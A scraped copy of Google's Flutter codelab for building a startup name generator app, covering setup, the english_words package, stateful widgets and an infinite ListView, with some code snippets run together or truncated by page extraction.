Guys,I am the maintaner of SCI, the ccNUMA technology standard. I knowalotprogramming models. There's also a lot of tough issues for dealing with failed nodes, and how you recover when peoples memory is all over the place across a nuch of machines. SCI scales better in ccNUMA and all NUMA technoogies scale very well when they are used with "Explicit Coherence" instead of "Implicit Coherence" which is what you get with SMP systems. Years of research by Dr. Justin Rattner at Intel's High performance labs demonstrated that shared nothing models scaledinto the thousands of nodes, while all these shared everything"Super SMP" approaches hit the wall at 64 processors generally.SCI is the fastest shared nothing interface out there, and it alsocan do ccNUMA. Sequent, Sun, DG and a host of other NUMA providersuse Dolphin's SCI technology and have for years. ccNUMA is useful for applications that still assume a shared nothing approach but thatuse the ccNUMA and NUMA capabilities for better optimization.Forget trying to recreate the COMA architecture of Kendall-Square. The name was truly descriptive of what happened in this architecturewhen a node fails -- goes into a "COMA". This whole discussion I havelived through before and you will find that ccNUMA is virtually unimplementable on most general purpose OSs. And yes, there are a lot of products and software out there, but when you look under the cover (like ServerNet) you discover their coherence models for the most part relay on push/pull explicit coherence models.My 2 cents.Jeff On Thu, Dec 06, 2001 at 12:09:32AM -0800, David S. Miller wrote:> From: Larry McVoy <lm@bitmover.com>> Date: Thu, 6 Dec 2001 00:02:16 -0800> > Err, Dave, that's *exactly* the point of the ccCluster stuff. You get> all that seperation for every data structure for free. Think about> it a bit. Aren't you going to feel a little bit stupid if you do all> this work, one object at a time, and someone can come along and do the> whole OS in one swoop? Yeah, I'm spouting crap, it isn't that easy,> but it is much easier than the route you are taking. > > How does ccClusters avoid the file system namespace locking issues?> How do all the OS nodes see a consistent FS tree?> > All the talk is about the "magic filesystem, thread it as much as you> want" and I'm telling you that is the fundamental problem, the> filesystem name space locking.> ->
|
http://lkml.org/lkml/2001/12/6/389
|
CC-MAIN-2016-30
|
refinedweb
| 419
| 63.19
|
I've been running a crawler in Scrapy to crawl a large site I'd rather not mention. I use the tutorial spider as a template, then I created a series of starting requests and let it crawl from there, using something like this:
def start_requests(self): f = open('zipcodes.csv', 'r') lines = f.readlines() for line in lines: zipcode = int(line) yield self.make_requests_from_url("" % zipcode)
To start, there are over 10,000 such pages, then each of those queue up a pretty large directory, from which there are several more pages to queue, etc., and scrapy appears to like to stay "shallow," accumulating requests waiting in memory instead of delving through them and then back up.
The result of this is a repetitive big exception that ends like this:
File "C:\Python27\lib\site-packages\scrapy\utils\defer.py", line 57, in <genexpr> work = (callable(elem, *args, **named) for elem in iterable) --- <exception caught here> --- File "C:\Python27\lib\site-packages\scrapy\utils\defer.py", line 96, in iter_errback yield next(it)
..... (Many more lines) .....
File "C:\Python27\lib\site-packages\scrapy\selector\lxmldocument.py", line 13, in _factory body = response.body_as_unicode().strip().encode('utf8') or '<html/>' exceptions.MemoryError:
Fairly quickly, within an hour or so of a crawler that should take several days, the python executable balloons to 1.8gigs and Scrapy won't function anymore (continuing to cost me many wasted dollars in proxy usage fees!).
Is there any way to get Scrapy to dequeue or externalize or iterate over (I don't even know the right words) stored requests to prevent such a memory problem?
(I'm not very proficient in programming, other than to piece together what I see here or in the docs, so I'm not equipped to troubleshoot under the hood, so to speak - I also was unable to install the full python/django/scrapy as 64-bit on W7, after days of trying and reading.)
|
https://www.howtobuildsoftware.com/index.php/how-do/cQe/python-django-python-27-memory-scrapy-scrapy-memory-error-too-many-requests-python-27
|
CC-MAIN-2019-47
|
refinedweb
| 324
| 62.38
|
Tk_MeasureChars, Tk_TextWidth, Tk_DrawChars, Tk_UnderlineChars - rou-
tines to measure and display simple single-line strings.
#include <tk.h>
int
Tk_MeasureChars(tkfont, string, numBytes, maxPixels, flags, lengthPtr)
int
Tk_TextWidth(tkfont, string, numBytes)
void
Tk_DrawChars(display, drawable, gc, tkfont, string, numBytes, x, y)
void
Tk_UnderlineChars(display, drawable, gc, tkfont, string, x, y, firstByte, lastByte)- |
Bytes (in) | |
The maximum number of bytes to con- |
sider when measuring or drawing |
string. Must be greater than or |
equal to 0.
int maxPixels (in) If maxPixels is >= 0, it specifies
the longest permissible line length
in pixels. Characters from string
are processed only until this many
pixels have been covered. If max-
Pixels is < 0, then the line length
is unbounded and the flags argument
is ignored.
int flags (in) Various flag bits OR-ed together:
TK_PARTIAL_OK means include a char-
acter as long as any part of it fits
not even one letter of the word fit,
then the first letter will still be
returned.
int *lengthPtr (out) Filled with the number of pixels
occupied by the number of characters
returned as the result of Tk_Mea-
sureChars.
Display *display (in) Display on which to draw.
Drawable drawable (in) Window or pixmap in which to draw.
GC gc (in) Graphics context for drawing charac-
ters. The font selected into this
GC must be the same as the tkfont.
int x, y (in) Coordinates at which to place the
left edge of the baseline when dis-
playing string. |
int first- |
Byte (in) | |
The index of the first byte of the |
first character to underline in the |
string. Underlining begins at the |
left edge of this character. |
int last- |
Byte (in) | |
The index of the first byte of the |
last character up to which the |
underline will be drawn. The char- |
acter specified by lastByte. Charac-
ters such as tabs, newlines/returns, and control characters that have-
able.
Tk 8.1 Tk_MeasureChars(3)
|
http://www.syzdek.net/~syzdek/docs/man/.shtml/man3/MeasureChar.3.html
|
crawl-003
|
refinedweb
| 314
| 71.24
|
NAME
ttyinit, ttyrestore, erasechar, killchar - initialize and restore terminal for I/O
SYNOPSIS
#include <cbase/escape.h>
ttyinit()
ttyrestore()
int erasechar()
int intrchar()
int killchar()
DESCRIPTION
The ttyinit function initializes escape(C-3) and getkey for terminal input and output. The TERM environment variable must contain the name of a terminal in the terminal definition. The string TERM is used to access the terminal definition file, if the terminal definition file is used. This can be done by the following command:
set TERM=terminaltype
Ttyinit reads the terminal definition named by TERM. If there is no environment variable TERM, ttyinit returns -1. If the terminal named by the TERM name is not defined, ttyinit returns 0 (zero). Ttyinit returns 1 on success. Any program using getkey, escape or termparm must first call ttyinit to determine that there is a valid terminal type defined. If there is a valid terminal definition file, it is loaded into program memory and used for all calls to escape, getkey, and termparm.
Normally input is read from the keyboard one line at a time. The ttyinit function sets the terminal driver so that characters can be read when they are typed rather than waiting until the RETURN key is pressed. The ttyinit function also disables character echoing, so it is the responsibility of the program calling ttyinit to echo typed characters.
The ttyrestore function restores the terminal state as it was before ttyinit was called. The first time the ttyinit function is called, it saves the current terminal state before it changes it, and ttyrestore uses this to reset the terminal.
The erasechar function returns the character that is typed when a character should be erased. The killchar function returns the character that is typed when a line should be erased. The ttyinit function disables character erasing and line killing that is normally performed. These functions are used to determine what characters are typed to erase a character or erase a line, so that they can be simulated by the program using ttyinit.
The intrchar functions returns the character that is typed to interrupt the process. Ttyinit does not disable interrupt characters.
The functions ttyinit and ttyrestore are not utilized in the MS-DOS version.
SEE ALSO
escape(C-3), termparm(C-3)
Chapter 2,
Terminal Independent I/O
C/Base Reference Manual Chapter 11,
Creating Terminal Definitions
|
http://www.conetic.com/helpdoc/cbautil/cbautil00000166.html
|
CC-MAIN-2017-47
|
refinedweb
| 393
| 63.19
|
Hi !
I’m newb to programing with Fmod.
I’m using VS 2005 and C++.
I did downloaded latest FMOD and did install it and put lib’s and include’s into my VS folders.
This is my code
[code:2j06aazd]
include <iostream>
include <fmod.hpp>
include <fmod_output.h>
using namespace std;
char a;
int main () {
pragma comment(lib,"fmodexL_vc.lib")
FSOUND_STREAM * stream = NULL; FSOUND_SetOutput(FSOUND_OUTPUT_DSOUND); stream = FSOUND_Stream_Open("fall.ogg" , FSOUND_LOOP_NORMAL , 0,0); FSOUND_Stream_Play(FSOUND_FREE, stream ); cout << "Press any key to exit " << endl; cin >> a FSOUND_Stream_Stop(stream); FSOUND_Close(); return 0;
}
[/code:2j06aazd]
My VS 2005 is getting me numerous "Undeclared identifier" and "Identifier not found " errors.
Can someone help me?
Thanks.
- ReiKo asked 11 years ago
- You must login to post comments
Did you download Fmod or FmodEx… because they are two different APIs and your API usage doesn’t look correct for FmodEx
- byteasc answered 11 years ago
Fmodex
Now i did downloaded FMOD3 and tryed to use the simple – load and play sound but i get these errors :
[code:2429bfqs]
mod.obj : error LNK2019: unresolved external symbol _FMUSIC_LoadSong@4 referenced in function _main
fmod.obj : error LNK2019: unresolved external symbol _FSOUND_Init@12 referenced in function _main
[/code:2429bfqs]
and this is my code :
[code:2429bfqs]
include <iostream>
include <fmod.h>
using namespace std;
char a;
int main () {
FSOUND_Init(44100, 32, 0);
FMUSIC_MODULE *mu = NULL;
mu = FMUSIC_LoadSong("canyon.mid");
FMUSIC_PlaySong(mu);
cout << "Press any key to exit" << endl;
cin >> a;
return 0;
}
[/code:2429bfqs]
thank you.
are you actually linking it into your project. Just make sure in your linker settings the correct library is linked. Just having it in a folder doesnt make it link.
Your first post was using fmod3 commands with fmod ex. That wouldnt even compile. Just look at an existing fmod example.
- brett answered 11 years ago
Actually I dont know how to link that lib in VS2005, I know how to link it in DEVC++ but not in VS2005.
Will try to find it on net though.
Pronlem solved, thanks & lock.
|
https://www.fmod.org/questions/question/forum-24995/
|
CC-MAIN-2018-47
|
refinedweb
| 338
| 74.9
|
<job name="Job Name" expression="* * * * *" command="XBMCCommand()" show_notification="true/false" />
from cron import CronManager,CronJob
manager = CronManager()
#get jobs
jobs = manager.getJobs()
#delete a job
manager.deleteJob(job.id)
#add a job
job = CronJob()
job.name = "name"
job.command = "Shutdown"
job.expression = "0 0 * * *"
job.show_notification = "false"
manager.addJob(job)
#Please be aware that adding or removing a job will change the job list (and change job ids) so please refresh your job list each time by using:
jobs = manager.getJobs()
#This will also pull in any new jobs that may have been added via other methods
<job name="Job Name" minute="*" hour="*" day="*" month="*" weekday="*" command="XBMCCommand()" show_notification="true/false" />
robweber Wrote:@HansMayer
My intent with this was to have the GUI be good enough that the format of the xml filewas something the user will never see. Since I couldnt finish the GUI this code is released as is in the hopes of getting some people interested. I would not try such submitting this to the xbmc repo for users at large like this.
Having the user interface have options for minute, second, etc would work. The power of cron is really what drives this so I wouldn't want to make it too simple and lose that.
HansMayer Wrote:I don't understand. What exact functionality would be lost if you would divide the options to make the arguments more obvious? You could still use hour="*/1" and stuff like that.
(2012-04-03 03:54)backspace Wrote: I think this needs to be finished by some of the skilled skinner's out there
I keep breaking xbmc trying different playlist options etc
Anyone out there keen to finish the GUI?
(2012-11-01 21:51)backspace Wrote: Is there a way to make this clear the music play list before timing another?
Also still hoping that someone jumping and finish the GUI (please)
|
https://forum.kodi.tv/showthread.php?tid=124888&pid=1065477
|
CC-MAIN-2017-26
|
refinedweb
| 317
| 64.81
|
Python’s
map() is a built-in function that executes a specified function on all the elements of an iterator and returns a
map object (an iterator) for retrieving the results. The elements are sent to the function as a parameter. An iterator, for example, can be a list, a tuple, a string, etc., and it returns an iterable map object.
We’ll be covering the following topics in this tutorial:
Syntax of map function in python
The syntax for the
map() function is as follows:
Syntax: map(function, iterable[, iterable1, iterable2,.., iterableN])
Parameters :
• Function: A mandatory function that will be applied to all the elements of a given iterable.
• Iterable: It is iterable and must be mapped. It could be a list, a tuple and so on. Many iterator objects may be passed to the
map() function.
Return Value
The function
map() applies a given function to every element of an iterable and returns an iterable map object, i.e. a tuple, a list, etc.
Python map() example
Let’s write a function to be used with
map() function.
#function to square the value passed to it
def square(x): return x * x
It’s a simple function that returns the square of the input object.
#creating a list my_list = [1, 2, 3, 4, 5] result = map(square, my_list) #prints a list containing the square values print(result)
The
map() function takes the square function and
my_list iterable. Any element in
my_list is passed by
map() to square function.
The function will print iterator elements with white space.
Python map() Function Example Using a Lambda Function
The first argument for
map() is a function, which we use to apply to each element. For each aspect of the iterable, Python calls the function once and returns the manipulated element to a map object.
The syntax of map() with a lambda function is as follows:
map(lambda argument(s): expression)
We may implement a
lambda function for a list like below with an expression we would like to use for each object in our list:
n = [5, 10, 15, 20, 25, 30]
We may use
map() and
lambda to use an expression against any of our numbers.
mapped = list(map(lambda x: x * x, n))
We declare elements here as x in our list. And we multiply by the same element. We move our number list as the
map() iterable.
We print a listing of the map object to get the results immediately:
print(mapped)
Complete Program and output:
|
https://ecomputernotes.com/python/map-function-in-python
|
CC-MAIN-2022-21
|
refinedweb
| 418
| 62.17
|
A poly-line primitive, a connected group of line segments. More...
#include <polyline.h>
Inherits jbt_primitive.
List of all members.
There is a fair amount of re-computation going on in this class. At some point it should be re-visited and sped a bit.
Note that at this time using any distance metric besides Euclidean (the default) is not supported. The results are undefined. To make it work with other metrics, we need to compute a basis for the query point which is similar to the basis used for computing the u coordinate of elemental parameterization.
Construct a new poly line. Pass the points for the line segments, the number of points and two radii.
Returns the number of points in the polyline.
Gets the position of the ith point.
|
http://pages.cpsc.ucalgary.ca/~jungle/software/jspdoc/jbt/class_jbt_polyline.html
|
crawl-003
|
refinedweb
| 131
| 69.18
|
Tax
Have a Tax Question? Ask a Tax Expert
Hi - I can help here
....
What you'll need to do is prepare the 1120-S, prepare the W-2 and pay yourself a reasonable salary, and then have the rest flow through the K-1 to you as an individual
Have you prepared your personal return for those years?
Yes, you can and should ... after a period (typically three years) unless you've dissolved the corp and filed a final 1120-S they hiot you with non-filing penalty (regardless of income)
Hang with me here and let my give you a bit of foundation
The S-Corp is a pass through (you likely know this) and the profits after your wage and the other s-corp expenses flow to you on a K-1
Makes a lot of sense, very reasonable
You can buy prior year copies of Turbotax here... that might make this much easier:
No, again until you file that 1120-S with the final return box they'll expect filings
let me estimate that for you... you'll have to bear with me a minute
perfect, yes
OK, on the wages, I used 85000, filing as single standard deduction generates a tax liability of 14,469 ... Total penalty and interest for non-filing and nonpayment is $21,876.06
that's 2012
1,322.00 of interest on the tax, taking it to $15,791.00,
$3,255.53 failure to file $297.45 interest totaling $3,552.98
Failure to pay 2532,08 ... totaling $21,876.06
no it changes ... do you have an estimate of tax liability?
Yes, but something they will waive under something called FTA (First Time Abatement) if you ave a clean compliance history for the previous three years or POTENTIALLY under reasonable casue
[sometimes]
Taxpayers can request relief from failure-to-file, failure-to-pay, and failure-to-deposit penalties in three ways, depending on their situation:
sorry looks like we crossed there let me read
Yes, it's the profit that matters ... the dollars became taxable once you have the kind of profit you had ... the physical distribution of them isn't a taxable event
What you're doing now is going back and reporting it (in tax terminology, getting into compliance)
The K-1 can SHOW distributions but you didn't have any ... What the K1 WILL shopw that's taxable is line 1 income
....
The 1120-S has gross receipts (your commissions, whatever) then expenses (your wages, automobile, business meals and entertainment, advertising, etc) that THAT number that's left is what gets taxed to you on the K-1 (flows to the front of the 1040)
Yep
hang on and I'll estimate those for 2012
Failure to file 2340 (AND remember we didn't include the 45000 that would flow to you on the first estimate of personal taxes,
distributions are not taxable events
the tax is based on (1) Wages and (2) profits (over and above the wages and other expenses)
to tax the distributions of profit in a pass through after they've already been taxed at the K-1 level would be taxing then twice
That's right, it's essentially a dividend (called distributive share of profits)
One o the biggest problems out there with S-Corps and investors (not shareholder employees) is when they have to pay tax on their portion of profits from a K-1 but the controlling owners don't distribute them any money to pay the taxes WITH
Understand ... was just trying to help you understand how it works ... the distributions only lower your tax BASIS but are not taxable
And not paying Social Security and medicare taxes (not PAID on that K-1 share) is exactly the reason FOR the required salary
It's very possible if you are clean (as described above) ... but would only apply to the first year
that's right ... it's the 1/2 that you withdraw and pay from wages and the matching 1/2 that the S-Corp (you, here) pays that's analogous to Self-employmentn tax for a self-employed individual (a very specific tern in taxation)
Just don't show the withholding and yes there will be tax and then with no withholding against it the tax is not reduced by the withholding
If I were you I'd use all ofnthe deduction that would be available to you ... in Real estate it's COMPLETELY expected that you'd have expenses (auto, lunches, maybe an office rent, advertising, etc) to reduce that 45,000
Could actually get it down low enough that you culd take the salary down and still have it seen as reasonable
Yes, those are expenses of the company ... here's what the expense section of the 1120-S looks like
Compensation of officers (see instructions—attach Form 1125-E) . . . . . . . . . . 7 8 Salaries and wages (less employment credits) . . . . . . . . . . . . . . . . 8 9 Repairs and maintenance . . . . . . . . . . . . . . . . . . . . . . . 9 10 Bad debts . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 11 Rents . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 12 Taxes and licenses . . . . . . . . . . . . . . . . . . . . . . . . . 12 13 Interest . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 14 Depreciation not claimed on Form 1125-A or elsewhere on return (attach Form 4562) . . . . 14 15 Depletion (Do not deduct oil and gas depletion.) . . . . . . . . . . . . . . . 15 16 Advertising . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 17 Pension, profit-sharing, etc., plans . . . . . . . . . . . . . . . . . . . . 17 18 Employee benefit programs . . . . . . . . . . . . . . . . . . . . . . 18 19 Other deductions (attach statement) . . . . . . . . . . . . . . . . . . . 19 20 Total deductions. Add lines 7 through 19
sorry, the formatting didn't transfer well ... but as you can see you're expected to have expenses ... You could always use form 2016 UNreimbursed employee expenses, but that would be contrived (making it harder than simply showing the expenses of your S-Corp)
LOTS of theories (rules of thumb) out there on that one ... IRS won't speak to it and say that it's a "facts and circumstances" question ... essentially you should look at whast you would be paid to do the same thing as an employee
That's a part of your S-Corps gross receipts ... OR if they gave you the 1099 based on your social and in your name ... then you'll report that on schedule C
Expense for that will go on the Shedule C ... or, again if the 1099 was to your S-Corp (not likely, there's an exception for 1099s to corporations) in the S-Corpexpenses
Would you like to do a phone consult ... LOTS of stuff here ... we're getting close, but a call would likely be much more efficient ... We can do what's called an "additional services offer" here where we're give a private/encrypted link to exchange phone and/or email ... I can do this for a small amount (say $9) BUTb would need to wait until about 3:00 I have another call scheduled for 2:15 (eastern time here)
OK I've answered both of these ... since the S-Corp doesn't PAY taxes there's just the non-filing fee ... it was something like 2300 for the 2012
Adn on the other one:
axpayers can request relief from failure-to-file, failure-to-pay, and failure-to-deposit penalties in three ways, depending on their situation:
2340
And on what your turbotax will do I'm not sure how sophisticated it is (I use an intuit professional program with my clients)
Listen ...I'd be glad to continue here OR do the phone consult ... but will need to step away for a bit for 2:15 conference call
If this HAS helped, and you DON’T have other questions … I'd really appreciate a positive rating (using the rating request, faces, or stars on your screen)
That's the only way I'll be credited for the work here.
But we can also pick back up on this a little later (either way)
still with me?
Hi,
I’m just checking back in to see how things are going.
Did my answer help?
Let me know…
Thanks
Lane
…
|
http://www.justanswer.com/tax/9lh81-bit-complicated-situation-opened-corp.html
|
CC-MAIN-2017-04
|
refinedweb
| 1,327
| 67.49
|
I from the arduino site:
#include <SPI.h> #include <Ethernet.h> #include <TextFinder.h> int treatPin = 9; // The pin the transistor is connected to // Enter a MAC address and IP address for your controller below. // The IP address will be dependent on your local network: byte mac[] = { 0xDE, 0xAD, 0xBE, 0xEF, 0xFE, 0xE4 }; byte ip[] = { 192,168,0,228}; //change this EthernetClient client; char TwitterHashtag[] = "#candy4greg"; //change this to your own twitter hashtag, or follow arduino ;-) char tweet[140] = "", oldTweet[140] = ""; char serverName[] = "search.twitter.com"; // twitter URL void setup() { pinMode(treatPin, OUTPUT); // initialize serial: Serial.begin(9600); if(!Ethernet.begin(mac)) Ethernet.begin(mac, ip); // connect to Twitter: delay(3000); for(int i = 0; i < 140; i++) { oldTweet[i] = 0; tweet[i] = 0; } } void loop(){ int i; Serial.println("connecting to server..."); if (client.connect(serverName, 80)) { TextFinder finder( client,2 ); Serial.println("making HTTP request..."); // make HTTP GET request to twitter: client.print("GET /search.atom?q=%23"); client.print(TwitterHashtag); client.println("&count=1 HTTP/1.1"); client.println("HOST: search.twitter.com"); client.println(); Serial.println("sended HTTP request..."); while (client.connected()) { if (client.available()) { Serial.println("looking for tweet..."); if((finder.find("<published>")&&(finder.getString("<title>","</title>",tweet,140)!=0))) { for(i = 0; i < 140; i++) if(oldTweet[i] != tweet[i]) break; if(i != 140) { Serial.println(tweet); feedKids(); for(i = 0; i < 140; i++) oldTweet[i] = tweet[i]; break; } } } } delay(1); client.stop(); } Serial.println("delay..."); delay (60000); // don't make this less than 30000 (30 secs), because you can't connect to the twitter servers faster (you'll be banned) // off course it would be better to use the "Blink without delay", but I leave that to you. } void feedKids() { Serial.println("Time to feed the kids!"); digitalWrite(treatPin, HIGH); delay(2000); // time in ms to run the motor digitalWrite(treatPin, LOW); }
The code searches for the hashtag #candy4greg and then compares it with the previous time it checked, if there is a difference I get fed :)
The below images and above code should point you in the right direction.
An endnote: The actual candy machine is from Maplin, here is a link to the product page:. They have a larger model, I want that now I know the idea works. That is at. Both are on sale at the moment, grab them before they become popular now us arduino lovers have discovered them!
A note for parents: Candy like chewing gum balls are not an acceptable substitute for square meals. Stick to giving the kids drumstick lollies and mojo’s and you’ll be fine.
|
https://labby.co.uk/arduino-based-twitter-enabled-candy-machine-all-working-and-monitoring-twitter/
|
CC-MAIN-2016-44
|
refinedweb
| 433
| 58.38
|
24 August 2012 13:11 [Source: ICIS news]
(recasts, clarifying company descriptor in third paragraph)
LONDON (ICIS)--?xml:namespace>
The value of the deal with Goodyear, which runs to the end of 2018, is estimated at zlotych (Zl) 3.74bn ($1.15bn, €912m), the company added.
Synthos is Europe's second largest SBR and BR producer.
The price-setting mechanism for rubber covered by the contract is based on feedstock prices, the company said.
“Although the new contract does not necessarily affect our sales volume forecasts, we perceive the news as positive from the perspective of volume visibility for the next few years,” said Piotr Drozd, an analyst at Prague-based investment bank WOOD & Company, in a note to investors.
“Assuming that the first contract volumes are delivered in the third quarter of this year, the estimated contract value implies approximately Zl 0.6bn in sales per annum. Against our ESBR price forecast of €2,300/tonne, this translates into around 60,000 tonnes of ESBR/SSBR annually, or 23% of our 2013-15 forecasts and 18% of our 2017-18 volume estimates [for the company],” he added.
Synthos is currently constructing a 100,000 tonne/year S-SBR and polybutadiene rubber (PBR) facility in Krakow, southern
“We expect the first batches from the new unit to arrive in 2015 and the unit to operate with 90% capacity utilisation starting from 2017,” said Drozd.
($1 = Zl 3.26,
|
http://www.icis.com/Articles/2012/08/24/9589988/polands-synthos-signs-six-year-1.15bn-rubber-deal-with.html
|
CC-MAIN-2015-11
|
refinedweb
| 238
| 51.28
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.